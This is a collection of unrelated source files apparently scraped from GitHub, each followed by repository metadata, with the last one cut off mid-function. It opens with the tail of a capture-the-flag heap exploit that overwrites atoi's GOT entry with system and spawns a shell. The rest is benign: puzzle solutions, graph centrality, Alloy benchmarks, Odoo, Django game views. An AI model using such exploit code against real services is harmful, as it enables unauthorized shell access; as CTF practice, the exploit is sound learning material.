str_bin_sh = baselibc+next(libc.search("/bin/sh"))
log.info('atoi_got: %#x' % atoi_got)
log.info('baselibc: %#x' % baselibc)
log.info('system: %#x' % system)
log.info('str_bin_sh: %#x' % str_bin_sh)
# overwrite atoi_got by system address
Edit(idx, p32(system))
r.sendline("/bin/sh")
r.interactive()
easy_heap(sys.argv[1])
# AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u} | phieulang1993/ctf-writeups | 2018/AceBearSecurityContest/pwn/easy_heap/easy_heap.py | easy_heap.py | py | 2,243 | python | en | code | 19 | github-code | 90 |
73820388777 | class Solution:
def binaryGap(self, N: int) -> int:
s = bin(N)[2:]
result = 0
pre = -1
for idx, c in enumerate(s):
if c == '1':
if pre != -1:
result = max(idx - pre, result)
pre = idx
return result
| HarrrrryLi/LeetCode | 868. Binary Gap/Python 3/solution.py | solution.py | py | 309 | python | en | code | 0 | github-code | 90 |
38924219131 | # You are given K eggs, and you have access to a building with N floors from 1 to N.
# Each egg is identical in function, and if an egg breaks, you cannot drop it again.
# You know that there exists a floor F with 0 <= F <= N such that any egg dropped at
# a floor higher than F will break, and any egg dropped at or below floor F will not break.
# Each move, you may take an egg (if you have an unbroken one) and drop it from any
# floor X (with 1 <= X <= N).
# Your goal is to know with certainty what the value of F is.
# What is the minimum number of moves that you need to know with certainty what F is,
# regardless of the initial value of F?
# Example 1:
# Input: K = 1, N = 2
# Output: 2
# Explanation:
# Drop the egg from floor 1. If it breaks, we know with certainty that F = 0.
# Otherwise, drop the egg from floor 2. If it breaks, we know with certainty that F = 1.
# If it didn't break, then we know with certainty F = 2.
# Hence, we needed 2 moves in the worst case to know what F is with certainty.
# Example 2:
# Input: K = 2, N = 6
# Output: 3
# Example 3:
# Input: K = 3, N = 14
# Output: 4
# Explanation :
# Drop from all floors ( recursion guess approach, try everything )
# From all floors we "max" the recursion call since we want the worst case or the case
# that reaches the base case and not a case where we were lucky (drop from first floor).
# We need a solution that COVERS ALL FLOORS ( a.k.a reaches the base case) and works in
# the given scenario perfectly, no matter where the threshold floor is.
# Minimum tries means MINIMUM wherever the threshold floor is, that is why maximum is
# taken from break vs not break.
# But min from all tries since we want the call which took minimum tries to reach the base case.
from sys import maxsize
def eggDrop(e, f):
if M[e][f] != None:
return M[e][f]
minMoves = maxsize
if e == 1 or f <= 1:
minMoves = f
else:
for k in range(1, f+1):
moves = 1 + max(eggDrop(e, f-k), eggDrop(e-1, k-1))
minMoves = min(minMoves, moves)
M[e][f] = minMoves
return minMoves
def make2DMemory(n, m):
global M
M = [[None for i in range(m+1)] for j in range(n+1)]
T = int(input())
for _ in range(T):
egg = int(input())
floor = int(input())
make2DMemory(egg, floor)
print(eggDrop(egg, floor))
# 3
# 1
# 2
# 2
# 6
# 3
# 14
| AniruddhaSadhukhan/Dynamic-Programming | D_Matrix Chain Multiplication/5_Egg Dropping Problem.py | 5_Egg Dropping Problem.py | py | 2,395 | python | en | code | 0 | github-code | 90 |
36154742924 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 16 10:25:32 2020
@author: sandipan
"""
import snap
import json
G = snap.LoadEdgeList(snap.PUNGraph, "facebook_combined.txt", 0, 1)
#Closeness
def Closness():
cc=[] #cc stores the Closeness Centrality for each node in the form of a pair
for i in G.Nodes():
NIdToDistH = snap.TIntH()
tot=0
shortestPath = snap.GetShortPath(G, i.GetId(), NIdToDistH)
for j in NIdToDistH:
tot+=NIdToDistH[j] #tot is the sum of distance of every other node from node i
cc.append([i.GetId(),(G.GetNodes()-1)/tot])
cc.sort(key=lambda x:x[1])
cc.reverse()
f=open("./centralities/closeness.txt","w")
for item in cc:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #Saving the list cc in the file in readable manner
f.close()
with open("cc.txt", "w") as fp: #Saving the list cc
json.dump(cc, fp)
def init(A,val):
A.clear()
for i in G.Nodes():
if val==-99:
A[i.GetId()]=[] #This function initializes a dictionary to the given value
else :
A[i.GetId()]=val #-99 indicates initialising an empty list for each key of the dict
return A
#Betweeness Centrality using Brandes Algorithm
def Betweenness():
d=dict()
sig=dict() #d stores the distance of every node from the given node
P=dict() #sig is the sigma , Cb stores the betweenness Centrality
Cb=dict()
delta=dict()
Cb=init(Cb,0)
for Nid in G.Nodes():
s=Nid.GetId()
P=init(P,-99)
sig=init(sig,0)
sig[s]=1
d=init(d,-1)
d[s]=0
S=[]
Q=[]
Q.append(s)
while (len(Q)!=0):
v=Q.pop(0)
S.append(v)
for w in G.GetNI(v).GetOutEdges():
if(d[w]<0):
Q.append(w)
d[w]=d[v]+1
if(d[w]==d[v]+1):
sig[w]=sig[w]+sig[v]
P[w].append(v)
delta=init(delta,0)
while (len(S)!=0):
w=S.pop()
for v in P[w]:
delta[v]=delta[v]+(sig[v]/sig[w])*(1+delta[w])
if(w!=s):
Cb[w]=Cb[w]+delta[w]
bc=[] #bc stores the betweenness centrality for each node
n=G.GetNodes()
x=2/((n-1)*(n-2))
for Nid in G.Nodes():
s=Nid.GetId()
Cb[s]=Cb[s]*x
bc.append([s,Cb[s]])
bc.sort(key=lambda x:x[1])
bc.reverse()
f=open("./centralities/betweenness.txt","w")
for item in bc:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #Saving the bc list in a text file
f.close()
with open("bc.txt", "w") as fp:
json.dump(bc, fp)
#pagerank
def finddeg(u):
c=0
for v in G.GetNI(u).GetOutEdges(): #This functions finds the outdegree of a node u
c+=1
return c
def returnSum(myDict):
s = 0
for i in myDict:
s = s + myDict[i] #Finds the sum of values in a dictionary
return s
def Pagerank():
d=dict()
cnt=0
for i in G.Nodes():
no=i.GetId()
if( no%4==0): #cnt is the total number of nodes with id%4==0
cnt+=1
for i in G.Nodes():
no=i.GetId()
if( no%4==0):
d[no]=1/cnt # biasing the preference vector
else:
d[no]=0
PR=dict()
temp=dict()
alpha=0.8
e=1e-6
itr=0
for i in G.Nodes():
u=i.GetId()
PR[u]=d[u]
while(itr<=3):
temp.clear()
temp=PR.copy()
for i in G.Nodes():
u=i.GetId()
t=0
for v in G.GetNI(u).GetOutEdges():
t+=temp[v]/finddeg(v)
temp[u]=alpha*t+(1-alpha)*d[u]
f=1.0/returnSum(temp)
for k in temp:
temp[k] = temp[k]*f
PR.clear()
PR=temp.copy()
itr+=1
pr=[] # pr stores the pagerank of each nodes
for Nid in G.Nodes():
s=Nid.GetId()
pr.append([s,PR[s]])
pr.sort(key=lambda x:x[1])
pr.reverse()
f=open("./centralities/pagerank.txt","w")
for item in pr:
f.write(str(item[0])+" "+str(round(item[1],6))+"\n") #saving the pr list in a text file
f.close()
with open("pr.txt", "w") as fp:
json.dump(pr, fp)
Closness()
Betweenness()
Pagerank()
| SandipanHaldar/Social-Computing- | 18ME10050 (2)/18ME10050/gen_centrality.py | gen_centrality.py | py | 5,150 | python | en | code | 0 | github-code | 90 |
3234133029 | import subprocess
import os
from os import path
import shutil
import signal
import sys
import random
import numpy as np
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from util import benchmark, options
def generate(num_courses, num_stu, max_core, max_interests):
lec_types = [
["MonAM", "WedAM"],
["MonAM", "WedAM", "FriPM"],
["MonPM", "WedPM"],
["TueAM", "ThuAM"],
["TuePM", "TuePM"]
]
courses = []
students = []
# generate courses
for i in range(num_courses):
courses.append(lec_types[np.random.randint(len(lec_types))])
# generate students cores and interests
for _ in range(num_stu):
# generate cores
cores = []
tmp = list(range(num_courses))
np.random.shuffle(tmp)
t = set()
for i in range(np.random.randint(max_core+1)):
found = False
for c in tmp[i:]:
if set(courses[c]) & t == set():
found = True
cores.append(c)
t = t | set(courses[c])
break
if not found:
break
# generate interests
np.random.shuffle(tmp)
if len(cores) > 1:
interests = [cores[np.random.randint(len(cores))]]
else:
interests = []
for c in tmp:
if set(courses[c]) & t == set():
interests.append(c)
break
for i in range(np.random.randint(max_interests)):
interests.append(tmp[i+1])
if len(cores) > 0:
cores = " + ".join(["C" + str(i) for i in cores])
else:
cores = "none"
interests = " + ".join(["C" + str(i) for i in interests])
students.append((cores, interests))
courses = list(map(lambda e: " + ".join(["C" + str(e[0]) + " -> " + l for l in e[1]]), enumerate(courses)))
courses_str = " +\n ".join(courses)
student_str = "\n".join([
f"one sig S{i} extends Student {{}} {{\n core = {students[i][0]}\n interests = {students[i][1]}\n}}"
for i in range(len(students))
])
als = f"""
abstract sig Day {{}}
one sig Mon, Tue, Wed, Thu, Fri extends Day {{}}
abstract sig Time {{}}
one sig AM, PM extends Time {{}}
abstract sig Course {{
lectures: set Lecture
}}
one sig {",".join(["C" + str(i) for i in range(num_courses)])} extends Course {{}}
fact {{
lectures = {courses_str}
}}
abstract sig Lecture {{
day: one Day,
time: one Time
}}
one sig MonAM, MonPM, TueAM, TuePM, WedAM, WedPM,
ThuAM, ThuPM, FriAM, FriPM extends Lecture {{}}
fact {{
day = MonAM -> Mon + MonPM -> Mon +
TueAM -> Tue +TuePM -> Tue +
WedAM -> Wed + WedPM -> Wed +
ThuAM -> Thu + ThuPM -> Thu +
FriAM -> Fri + FriPM -> Fri
time = MonAM -> AM + MonPM -> PM +
TueAM -> AM +TuePM -> PM +
WedAM -> AM + WedPM -> PM +
ThuAM -> AM + ThuPM -> PM +
FriAM -> AM + FriPM -> PM
}}
abstract sig Student {{
core: set Course,
interests: set Course,
courses: set Course
}}
{student_str}
pred conflict[c1, c2: Course] {{
some l1, l2: Lecture {{
l1 in c1.lectures
l2 in c2.lectures
l1.day = l2.day
l1.time = l2.time
}}
}}
pred validSchedule[courses: Student -> Course] {{
all stu: Student {{
#stu.courses > 2
stu.core in stu.courses
all disj c1, c2: stu.courses | not conflict[c1, c2]
}}
}}
"""
sat = als + "run AnySchedule {\n validSchedule[courses]\n all stu: Student | some stu.interests & stu.courses\n}"
maxsat = als + "run MaxInterests1 {\n validSchedule[courses]\n all stu: Student | maxsome stu.interests & stu.courses\n}"
return sat, maxsat
def run(outpath, run_sat=False, run_maxsat_one=False, run_maxsat_all=False, run_maxsat_part=False,
run_maxsat_part_auto=False, timeout=180, repeat=5):
max_core = 3
max_interests = 6
params = [
(30, 40),
(40, 50),
(50, 60),
(60, 70),
(70, 80),
(80, 90),
(90, 100)
]
problems = []
maxsat_files = []
sat_files = []
for num_courses, num_stu in params:
problem = f"{num_courses}_{num_stu}_{max_core}_{max_interests}"
problems.append(problem)
sat, maxsat = generate(num_courses, num_stu, max_core, max_interests)
sat_filename = path.join(outpath, f"sat_{problem}.als")
sat_files.append(sat_filename)
with open(sat_filename, "w") as f:
f.write(sat)
maxsat_filename = path.join(outpath, f"maxsat_{problem}.als")
maxsat_files.append(maxsat_filename)
with open(maxsat_filename, "w") as f:
f.write(maxsat)
sat_files = sat_files if run_sat else None
benchmark(problems, sat_files, maxsat_files, run_maxsat_one, run_maxsat_all,
run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
def run_models(modelpath, run_sat=False, run_maxsat_one=False, run_maxsat_all=False, run_maxsat_part=False,
run_maxsat_part_auto=False, timeout=180, repeat=5):
models = filter(lambda x: x.startswith("maxsat") and x.endswith(".als"), os.listdir(modelpath))
problems = []
maxsat_files = []
sat_files = []
for m in models:
problems.append(m[len("maxsat_"):-len(".als")])
maxsat_files.append(path.join(modelpath, m))
sat_files.append(path.join(modelpath, m.replace("maxsat", "sat")))
sat_files = sat_files if run_sat else None
benchmark(problems, sat_files, maxsat_files, run_maxsat_one, run_maxsat_all,
run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
if __name__ == "__main__":
run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat, model, from_file = options()
if model is None:
outpath = path.join(os.getcwd(), "out")
if path.exists(outpath):
shutil.rmtree(outpath)
os.mkdir(outpath)
run(outpath, run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
else:
run_models(model, run_sat, run_maxsat_one, run_maxsat_all, run_maxsat_part, run_maxsat_part_auto, timeout, repeat)
| cmu-soda/alloy-maxsat-benchmark | scripts/course/benchmark.py | benchmark.py | py | 5,850 | python | en | code | 0 | github-code | 90 |
20137377485 | from odoo import api, fields, models
class BankStatementBalancePrint(models.TransientModel):
_name = 'bank.statement.balance.print'
_description = 'Bank Statement Balances Report'
journal_ids = fields.Many2many(
comodel_name='account.journal',
string='Financial Journal(s)',
domain=[('type', '=', 'bank')],
help="Select here the Financial Journal(s) you want to include "
"in your Bank Statement Balances Report.")
date_balance = fields.Date(
string='Date', required=True, default=fields.Datetime.now)
@api.multi
def balance_print(self):
data = {
'journal_ids': self.journal_ids.ids,
'date_balance': self.date_balance,
}
return self.env.ref(
'account_bank_statement_advanced.statement_balance_report_action'
).report_action(self, data=data)
| luc-demeyer/noviat-apps | account_bank_statement_advanced/wizard/bank_statement_balance_print.py | bank_statement_balance_print.py | py | 890 | python | en | code | 20 | github-code | 90 |
18571996549 | import sys
def main():
input = sys.stdin.readline
N,M=map(int, input().split())
G=[[] for _ in range(N)]
inn=[0]*N
for _ in range(M):
l,r,d=map(int, input().split())
l,r=l-1,r-1
G[l].append((r, d))
inn[r] += 1
ds = [-1] * N
for i in range(N):
if inn[i]: continue
ds[i] = 0
stk = [(i, 0)]
while stk:
v, d = stk.pop()
for to, dt in G[v]:
if ds[to] != -1:
if ds[to] != d+dt:
print('No')
return
continue
ds[to] = d+dt
stk.append((to, d+dt))
if any([d == -1 for d in ds]):
print('No')
return
print('Yes')
if __name__ == '__main__':
main() | Aasthaengg/IBMdataset | Python_codes/p03450/s236120698.py | s236120698.py | py | 816 | python | en | code | 0 | github-code | 90 |
24017207374 | import flaskr
import model
import ricochet
import json
from flaskr.db import get_db
app = flaskr.create_app()
with app.app_context():
cursor = get_db().cursor()
row = cursor.execute("SELECT * from game where id=2").fetchone()
game = row[7]
gamejson = json.loads(game)
playerstate = gamejson['playerState']
wallsH = gamejson['wallHorizontal']
wallsV = gamejson['wallVerticle']
goal = gamejson['goal']
print(playerstate)
newplayerstate = list()
for player in playerstate:
top = player['top']
left = player['left']
if player['colorSignifier'] == 'blue':
color = 'B'
elif player['colorSignifier'] == 'red':
color = 'R'
elif player['colorSignifier'] == 'yellow':
color = 'Y'
else:
color = 'G'
position = top * 16 + left
newplayerstate.append({
'position': int(position),
'color': color
})
result = ['' for x in range(256)]
wallsV = wallsV[1:]
for wall in wallsH:
top = wall['top']
left = wall['left']
if top >= 16:
top = top - 1
position = top * 16 + left
if left < 16:
result[int(position)] += 'S'
else:
position = top * 16 + left
if left < 16:
result[int(position)] += 'N'
if top != 0:
result[int(position) - 16] += 'S'
for wall in wallsV:
top = wall['top']
top = top
left = wall['left']
if left >= 16:
left = left - 1
position = top * 16 + left
if top < 16:
result[int(position)] += 'E'
else:
if top < 16:
position = top * 16 + left
result[int(position)] += 'W'
if left != 0:
result[int(position) - 1] += 'E'
grid = result
tokenlist = ['BH','GH','RH','YH']
colors = list()
robots = list()
for player in newplayerstate:
robots.append(player['position'])
colors.append(player['color'])
goaltop = goal['top']
goalleft = goal['left']
gridlist = list()
placeholder = grid[int(goaltop * 16 + goalleft)]
paths = list()
for x, token in enumerate(tokenlist):
grid1 = grid
grid1[int(goaltop * 16 + goalleft)] = placeholder + token
for x, space in enumerate(grid1):
if space == '':
grid1[x] = 'X'
print('answers')
print(grid1)
print(robots)
print(colors)
print(token)
paths.append(ricochet.search(model.Game(grid=grid1, robots=robots, col=colors, token=token)))
import json
jsoning = json.loads(json.dumps(paths, indent=4))
newpaths = list()
for x, path in enumerate(jsoning):
for y, pathy in enumerate(path):
if pathy[0] == 'G':
newpaths.append('B' + pathy[1])
elif pathy[0] == 'B':
newpaths.append('R' + pathy[1])
elif pathy[0] == 'R':
newpaths.append('G' + pathy[1])
else:
newpaths.append('Y' + pathy[1])
newpaths.append('NEXT')
print(newpaths)
| Kwazinator/robotsevolved | Solver/solver.py | solver.py | py | 2,925 | python | en | code | 7 | github-code | 90 |
72952291498 | import numpy as np
import matplotlib.pyplot as plt
numpy_str = np.linspace(0,10,20) #random 20 tane float sayı oluştur 0 dan 10 a kadar
print(numpy_str)
numpy_str1 = numpy_str ** 3
my_figure = plt.figure()
figureAxes = my_figure.add_axes([0.2,0.2,0.4,0.4]) #ilk iki değer x ekseni ve y ekseninin etkiliyor, son iki değer ise büyüklüğünü etkiliyor
figureAxes.plot(numpy_str,numpy_str1,"g")
figureAxes.set_xlabel("X ekseni")
figureAxes.set_ylabel("Y ekseni")
figureAxes.set_title("Graph")
plt.show() | berkayberatsonmez/Matplotlib | Matplotlib/plt_figure.py | plt_figure.py | py | 526 | python | tr | code | 0 | github-code | 90 |
22356401525 | from django.db import models
from personas.models import Persona
from productos.models import Producto
import datetime
from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
# Create your models here.
class Venta(models.Model):
cliente = models.ForeignKey(Persona, on_delete=models.CASCADE)
fecha = models.DateTimeField(blank=True)
estado = models.BooleanField(default = True)
def __str__(self):
return str(self.fecha)
class Venta_detalle(models.Model):
venta = models.ForeignKey(Venta, on_delete=models.CASCADE)
producto = models.ForeignKey(Producto, on_delete=models.CASCADE)
cantidad = models.IntegerField(default = 1)
precio = models.DecimalField( max_digits=5, decimal_places=2, default = 0)
estado = models.BooleanField(default = True)
def __str__(self):
return str(self.cantidad)
@receiver(post_save, sender=Venta_detalle)
def save_venta_detalle(sender, instance, **kwargs):
prod = Producto.objects.get(id=instance.producto.id)
prod.stock -=instance.cantidad
prod.save()
print('stock actualizado=' + str(prod.stock))
@receiver(post_delete, sender=Venta_detalle)
def delete_venta_detalle(sender, instance, **kwargs):
prod = Producto.objects.get(id=instance.producto.id)
prod.stock +=instance.cantidad
prod.save()
print('stock actualizado=' + str(prod.stock)) | juksonvillegas/apptca-backend | ventas/models.py | models.py | py | 1,397 | python | en | code | 0 | github-code | 90 |
5721409167 | import sys
for i in sys.stdin:
totalNumber = i
dictTotal = {}
numbers = sys.stdin.readline().strip().split(' ')
for j in numbers:
if dictTotal.get(list(j)[-1]):
dictTotal.get(list(j)[-1]).append(int(j))
dictTotal.update(
{list(j)[-1]: dictTotal.get(list(j)[-1])})
else:
dictTotal.update({list(j)[-1]: [int(j)]})
for k in dictTotal.keys():
dictTotal[k] = sorted(dictTotal.get(k), reverse=True)
sortKeys = sorted(dictTotal.keys())
result = []
for m in sortKeys:
result += [str(i) for i in dictTotal[m]]
print(' '.join(result))
| lalalalaluk/python-zerojudge-practice | a225明明愛排列.py | a225明明愛排列.py | py | 650 | python | en | code | 0 | github-code | 90 |
2449798885 | from django.urls import path
from . import views
app_name='users'
urlpatterns = [
path('create_event', views.create_event, name='create_event'),
path('display_events',views.display_events, name='display_events'),
path('add_event', views.add_event, name='add_event'),
path('hosted_events',views.hosted_events, name='hosted_events'),
path('report_user/<int:id>/',views.report_user,name='report_user'),
path('createdevents',views.createdevents,name='createdevents'),
path('joinedevents',views.joinedevents,name='joinedevents'),
path('<int:eventid>/getregistrations',views.getregistrations,name='getregistrations'),
path('dashboard',views.dashboard,name='dashboard')
] | sampan-s-nayak/event-publishing-portal | event_management/user/urls.py | urls.py | py | 706 | python | en | code | 3 | github-code | 90 |
37379196108 | from django.utils import dateparse
from django.db.models import Avg, Count, Max
from rest_framework import views
from rest_framework.response import Response
from rest_framework import authentication
from rest_framework import exceptions
from sga.models import Promotion, AgeGroup, AgeGroupPromotion, Area, AreaPromotion
from sga.rest.permissions import AdminWritePermissions
class PromotionFilterView(views.APIView):
authentication_classes = (authentication.TokenAuthentication,
authentication.SessionAuthentication,
authentication.BasicAuthentication)
permission_classes = (AdminWritePermissions,)
def get(self, request):
if not request.user.is_authenticated():
raise exceptions.NotAuthenticated()
self.user = request.user
self.params = request.query_params
return Response(self.process_promotions())
def process_promotions(self):
json = {}
promotions = Promotion.objects.all()
age = self.params.get('age')
promotion_type = self.params.get('promotion_type')
area = self.params.get('area')
if promotion_type:
promotions = promotions.filter(promotion_type=promotion_type)
for area_promotion in AreaPromotion.objects.filter(area=area):
for age_group_promotion in AgeGroupPromotion.objects.filter(age_group__age_min__lte=age).filter(age_group__age_max__gte=age):
if age_group_promotion.promotion.id == area_promotion.promotion.id:
promotion = promotions.get(id=area_promotion.promotion.id)
print(promotion.name)
return json
def process_stores(self, stats):
json_data = []
parent = self.params.get('store')
for store in Store.objects.filter(parent=parent):
area_max = stats.filter(area__store=store).aggregate(Max('area'))['area__max']
area = Area.objects.get(id=area_max)
json = {
'store': {
'id': store.id,
'name': store.name,
'best_area' : {'id': area.id, 'name': area.name},
'nr_of_devices': stats.filter(area__store=store).annotate(Count('device', distinct=True)).count(),
'best_day': self.get_max_day(stats.filter(area__store=store)),
'best_age': self.get_best_age(stats.filter(area__store=store))
}
}
json_data.append(json)
return json_data
| ruben-dossantos/sga | server/sga/rest/promotion_filter.py | promotion_filter.py | py | 2,567 | python | en | code | 0 | github-code | 90 |
24648141570 | # -*- coding: utf-8 -*-
import random
import urllib
import datetime
from dateutil.relativedelta import relativedelta
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.contrib.humanize.templatetags.humanize import intcomma
from submodule.horizontalpartitioning import transaction_commit_on_success_hp
from submodule.gsocial.http import HttpResponseOpensocialRedirect
from submodule.gsocial.set_container import containerdata
from submodule.ajax.handler import AjaxHandler
from submodule.gsocial import ActionRecord
from submodule.gamelog.models import DailyAccessLog
from submodule.gsocial.utils.achievement import Achievement
from module.player.api import (get_player_by_osuserid, get_fleshman)
from module.player.decorators import require_player
from module.playercard.battle_api import (
get_player_attack_front_list,
get_player_defense_front_list
)
from module.misc.view_utils import render_swf
from module.common.deviceenvironment.device_environment import media_url
from module.common.flash_manager import PromotionFlashManager
from module.playercarddeck.api import get_deck_all
from module.friend.api import get_friend_player_count
from module.serialcampaign.api import get_publish_serialcampaign_list
from module import i18n as T
from module.common.authdevice import is_auth_device_and_just_authorized_now
from module.playerbattleresult.api import get_battle_history_list
from module.bless.api import get_bless_histories
from module.notification.api import get_notification_list
from module.loginbonus.models import LoginStamp
from module.loginbonus.api import get_valid_loginbonus_list, get_extra_or_active_login_stamp
from module.campaign.regist_api import get_active_regist_campaign
from module.campaign.api import get_active_buildup_campaign
from module.playercampaign.api import acquire_regist_campaign
from module.playerloginbonus.api import acquire_login_bonus, acquire_login_stamp, get_latest_login_stamp_history
from module.playerprofile.api import get_profile_comment
from module.playeradventbox.api import get_latest_advent_box_history, acquire_advent_box
from module.playeradventbox.models import PlayerAdventBoxRewardHistory
from module.adventbox.api import get_active_advent_box
from module.bannerarrange.api import get_banner_tag, get_active_arrange_list
from module.bannerarrange.models import ArrangeBase
from module.card.models import DummyCard
from gachamodule.playerfgacha.api import player_one_time_per_day_gashapon
from module.actionlog.api import log_do_growth
from module.information.models import Information as informations
from module.information.models import Information
from module.actionlog.api import log_do_view_page_mypage
from module.battle.api import BATTLE_SIDE_ATTACK, BATTLE_SIDE_DEFENSE, get_battle_member_list
from module.invitation.api import callback_invitation_end_player_tutorial
from module.shop.api import get_limited_shop_list
from module.common import get_cache_limit_of_day
from module.playergashapon.api import player_time_free_gashapon
from module.gashapon.api import get_active_gashapon_stamp
from module.imas_guild.api_pet import get_current_pet
from module.continuancebonus.api import check_continuance_bonus
from module.comebackbonus.api import get_valid_comebackbonus
from module.playercomebackbonus.api import acquire_comebackbonus
from module.continuationcampaign.api import get_valid_continuationcampaign
from module.playercontinuationcampaign.api import check_and_do_continuationcampaign
from module.compensation.api import get_player_compensations
from eventmodule.ecommon.api import get_opening_events, get_ending_events
from eventmodule import Event
from module.navimessage.api import get_navi_message
from eventmodule.ecommon.navi_message import select_navi_message
from module.weekdungeon.models import Dungeon
from module.panelmission.api import mission_clear_flash_cheack
from module.incentive.api import check_incentive_information
def auth_login(request):
from django.contrib.auth import authenticate, login
next = 'mobile_root_top'
message = ''
if request.method == 'POST':
if 'username' in request.POST and 'pasword' in request.POST:
username = request.POST['username']
password = request.POST['pasword']
if 'next' in request.POST:
next = request.POST['next']
if not next:
next = 'mobile_root_top'
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return HttpResponseOpensocialRedirect(reverse(next))
message = u'認証できませんでした'
else:
if 'next' in request.GET:
next = request.GET['next']
ctxt = RequestContext(request, {
'message': message,
'next': next,
})
return render_to_response('root/auth/login.html', ctxt)
def auth_logout(request):
from django.contrib.auth import logout
logout(request)
return HttpResponseOpensocialRedirect(reverse('auth_login'))
def _log_daily_access(_debug=False):
from functools import wraps
from django.db import connection, transaction
def decorator(view_func):
@wraps(view_func)
def _wrapped_view(request, *args, **kwds):
#if not settings.IS_COLOPL:
osuser_id = request.player.pk
now = datetime.datetime.now()
is_smartphone = getattr(request, 'is_smartphone', False)
selectsql = 'SELECT EXISTS (SELECT 1 FROM gamelog_dailyaccesslog WHERE osuser_id=%s AND DATE(accessed_at) = DATE(%s))'
selectparam = [osuser_id, now.strftime("%Y-%m-%d")]
cursor = connection.cursor()
cursor.execute(selectsql, selectparam)
for row in cursor.fetchone():
if row == 0:
sql = 'INSERT INTO gamelog_dailyaccesslog(osuser_id,accessed_at,is_smartphone) VALUES(%s,%s,%s)'
param = [osuser_id,now.strftime("%Y-%m-%d %H:%M:%S"),is_smartphone]
cursor.execute(sql, param)
transaction.commit_unless_managed()
return view_func(request, *args, **kwds)
return _wrapped_view
return decorator
@require_player
@_log_daily_access()
def root_top(request):
player = get_player_by_osuserid(request.osuser.userid)
if player is None:
return HttpResponseOpensocialRedirect(reverse('prologue_index'))
# Ameba 事前登録API
if settings.IS_AMEBA or settings.IS_MOBCAST:
check_incentive_information(request, player.pk)
if settings.IS_COLOPL and not player.consent.is_agree(1):
return HttpResponseOpensocialRedirect(reverse('consent_colopl'))
player = request.player
if not player.is_end_tutorial():
return HttpResponseOpensocialRedirect(reverse('mobile_root_index'))
##==最新3件のお知らせを表示
#notification_pager, notification_list = get_notification_list(limit=3, sort=u'published_at', reverse=True)
notification_list = list()
notification_lists = list()
if request.is_smartphone:
notification_pager, notification_list = get_notification_list(category=1, limit=3, sort=u'published_at', reverse=True)
notification_pager, notification_lists = get_notification_list(category=3, limit=3, sort=u'published_at', reverse=True)
else:
notification_pager, notification_list = get_notification_list(limit=3, sort=u'published_at', reverse=True)
fleshman_list = get_fleshman(player.pk, 1)
if len(fleshman_list) < 1:
fleshman = None
else:
fleshman = fleshman_list[0]
banners = get_banner_tag(ArrangeBase.TOPPAGE)
#==有効なシリアルキャンペーンを表示
serialcampaign_list = get_publish_serialcampaign_list()
serialcampaign_list.reverse()
gashapon_stamp = get_active_gashapon_stamp()
from module.seek.api import HIDDEN_TYPE_APP_TOP, is_not_found
is_seek_event = is_not_found(player, HIDDEN_TYPE_APP_TOP)
ctxt = RequestContext(request, {
'notification_list': notification_list,
'notification_lists': notification_lists,
'target_player': fleshman,
'banners': banners,
'serialcampaign_list': serialcampaign_list,
'gashapon_stamp': gashapon_stamp,
'is_seek_event': is_seek_event,
'type': player.encryption(HIDDEN_TYPE_APP_TOP),
})
return render_to_response('root/top.html', ctxt)
#==リストの表示件数
def _history_list_select(history, num):
history_list = []
for i, hist in enumerate(history):
if i > num - 1:
break
history_list.append(hist)
return history_list
@require_player
@_log_daily_access()
@transaction_commit_on_success_hp
def root_index(request):
player = request.player
log_do_view_page_mypage()
if settings.IS_COLOPL and not player.consent.is_agree(1):
return HttpResponseOpensocialRedirect(reverse('consent_colopl'))
if player.growth == 0:
Information.reset_growth(player.pk)
# 浮いたセッション情報を消す
try:
request.session.pop("add_card_ids", None)
request.session.pop("buildup_add_id", None)
request.session.pop("buildup_result", None)
request.session.pop("checked_card_ids", None)
request.session.pop("buildup_is_include_rare", None)
request.session.pop("battle_ready_url", None)
request.session.pop("GROWTH_RETURN_URL", None)
request.session.pop("doli_raid2_result", None) # 一時対応
request.session.pop("tower_result", None) # 一時対応
except:
pass # セッション情報の削除に失敗してもガタガタ言わない
# 端末認証をチェックする -- 内部でキャッシュされている(gsocial)
if not player.flag_is_done_invite_callback():
isu_auth_device, is_auth_now = is_auth_device_and_just_authorized_now(request)
# たった今端末認証ができたので特典を付与する
if is_auth_now:
callback_invitation_end_player_tutorial(player)
player.flag_on_done_invite_callback()
player.save()
# 認証済み状態で後からライフサイクルイベントが来た場合、ここで報酬配布
if isu_auth_device and player.flag_is_need_invite_callback():
callback_invitation_end_player_tutorial(player)
player.flag_off_need_invite_callback()
player.flag_on_done_invite_callback()
player.save()
# コラボCP用ログインカウンタ
from module.papp.game.api.collabo_app.models import PlayerHistory
from module.papp.game.api.collabo_app.api import get_active_collabo
collabo = get_active_collabo()
if collabo:
PlayerHistory.increment_login_count(player.pk, request.osuser.age, collabo.pk, request.is_smartphone)
animation = _root_index_animation(request, player)
if animation:
return animation
# 最終ログイン日時を記録
player.set_last_login_at()
Event.induction(player)
Event.rare_boss_introduction(player)
Event.guerrilla_boss_introduction(player)
friend_count = get_friend_player_count(player)
#==戦闘履歴
battle_history_list = get_battle_history_list(player, limit=2)
#==挨拶履歴
bless_history_list = get_bless_histories(player.pk, request, limit=2)
my_guild = player.guild
#==最新3件のお知らせを表示
notification_list = list()
notification_lists = list()
if request.is_smartphone:
notification_pager, notification_list = get_notification_list(category=1, limit=3, sort=u'published_at', reverse=True)
notification_pager, notification_lists = get_notification_list(category=3, limit=3, sort=u'published_at', reverse=True)
else:
notification_pager, notification_list = get_notification_list(limit=3, sort=u'published_at', reverse=True)
# 未読の最新お知らせがある場合は、新着にのせる。
news_id = 0
before_news_id = player.get_latest_news()
try:
news_id = notification_list[0].id
except IndexError:
news_id = 0
if not before_news_id:
before_news_id = news_id
